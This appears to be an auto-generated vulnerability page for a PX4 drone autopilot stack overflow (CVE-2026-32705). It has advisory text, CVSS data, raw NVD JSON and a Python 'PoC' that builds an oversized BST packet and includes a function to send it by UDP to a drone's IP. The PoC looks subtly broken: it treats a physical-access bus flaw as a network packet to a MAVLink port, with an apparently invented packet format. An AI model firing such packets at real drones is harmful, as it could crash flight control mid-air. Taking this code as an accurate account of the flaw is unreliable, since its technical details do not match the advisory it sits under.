Security Vulnerability Report
CVE-2026-32705 CVSS 6.8 MEDIUM

CVE-2026-32705

Published: 2026-03-16 14:19:41
Last Modified: 2026-03-17 17:16:15

Description

PX4 autopilot is a flight control solution for drones. Prior to 1.17.0-rc2, the BST telemetry probe writes a string terminator using a device-provided length without a bounds check. A malicious BST device can report an oversized dev_name_len, causing a stack overflow in the driver and crashing the task (or enabling code execution). This vulnerability is fixed in 1.17.0-rc2.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:alpha1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:beta1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:rc1:*:*:*:*:*:* - VULNERABLE
PX4-Autopilot < 1.17.0-rc2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2026-32705 PoC - Malicious BST Device Simulation
# This PoC demonstrates how a malicious BST device can trigger stack overflow
# in PX4 autopilot's BST telemetry driver

import struct
import socket
import time


def create_malicious_bst_packet():
    """
    Create a malicious BST packet with oversized dev_name_len
    to trigger stack overflow in PX4 BST telemetry driver
    """
    # BST message header
    bst_magic = 0x424C  # 'BL' magic bytes
    msg_type = 0x0001  # Device info message type

    # Malicious oversized dev_name_len
    # This will cause stack overflow when driver writes string terminator
    malicious_dev_name_len = 0xFFFF  # Oversized length without bounds check

    # Build malicious BST packet
    packet = struct.pack('<HH', bst_magic, msg_type)
    packet += struct.pack('<H', malicious_dev_name_len)

    # Add oversized device name data
    overflow_data = b'A' * malicious_dev_name_len
    packet += overflow_data

    return packet


def exploit_px4_bst_telemetry(target_ip='192.168.1.100', target_port=14556):
    """
    Send malicious BST packet to trigger CVE-2026-32705

    Args:
        target_ip: IP address of the PX4-enabled drone
        target_port: BST telemetry port (default MAVLink port)
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)

        malicious_packet = create_malicious_bst_packet()

        print(f"[*] Sending malicious BST packet to {target_ip}:{target_port}")
        print(f"[*] Packet size: {len(malicious_packet)} bytes")
        print(f"[*] Malicious dev_name_len: 0xFFFF")

        sock.sendto(malicious_packet, (target_ip, target_port))

        print("[+] Malicious packet sent successfully")
        print("[!] Target PX4 BST driver may have crashed or been exploited")

        sock.close()
        return True

    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def simulate_bst_device():
    """
    Simulate a malicious BST device that can be connected to drone's BST port
    This represents the physical attack vector (AV:P)
    """
    print("=" * 60)
    print("CVE-2026-32705 - PX4 BST Telemetry Stack Overflow PoC")
    print("=" * 60)

    print("\n[*] Attack Vector: Physical access to BST telemetry port")
    print("[*] Target: PX4 autopilot < 1.17.0-rc2")
    print("[*] Vulnerability: Stack overflow via oversized dev_name_len")

    print("\n[!] This PoC is for educational and authorized testing purposes only")
    print("\n[*] Simulating malicious BST device...")

    # Generate the malicious packet
    packet = create_malicious_bst_packet()

    print(f"[+] Generated malicious BST packet")
    print(f" - Magic: 0x424C")
    print(f" - Message Type: 0x0001 (Device Info)")
    print(f" - dev_name_len: 0xFFFF (malicious oversized value)")
    print(f" - Total packet size: {len(packet)} bytes")

    print("\n[*] When received by vulnerable PX4 BST driver:")
    print(" 1. Driver reads dev_name_len = 0xFFFF")
    print(" 2. Driver writes string terminator at stack offset 0xFFFF")
    print(" 3. Stack buffer overflow occurs")
    print(" 4. Return address / function pointers can be overwritten")
    print(" 5. Arbitrary code execution possible")

    return packet


if __name__ == "__main__":
    simulate_bst_device()

    # Uncomment to actually send the packet:
    # exploit_px4_bst_telemetry('DRONE_IP', 14556)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32705", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:41.403", "lastModified": "2026-03-17T17:16:15.363", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "PX4 autopilot is a flight control solution for drones. Prior to 1.17.0-rc2, the BST telemetry probe writes a string terminator using a device-provided length without bounds. A malicious BST device can report an oversized dev_name_len, causing a stack overflow in the driver and crashing the task (or enabling code execution). This vulnerability is fixed in 1.17.0-rc2."}, {"lang": "es", "value": "El piloto automático PX4 es una solución de control de vuelo para drones. Antes de la versión 1.17.0-rc2, la sonda de telemetría BST escribe un terminador de cadena utilizando una longitud proporcionada por el dispositivo sin comprobación de límites. Un dispositivo BST malicioso puede informar un dev_name_len sobredimensionado, causando un desbordamiento de pila en el controlador y bloqueando la tarea (o permitiendo la ejecución de código). 
Esta vulnerabilidad está corregida en la versión 1.17.0-rc2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.0", "matchCriteriaId": "2FC2D6F1-D77D-44C2-A99C-55CB5A4474B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "033A0A82-2986-44D5-A712-47B8D43407FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "3F2EA96E-BC3A-42AB-B81B-53D5872B2296"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "1EAC5320-8D94-477D-AB85-144F8218DDFB"}]}]}], "references": [{"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-79mp-34pp-2f3f", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-79mp-34pp-2f3f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}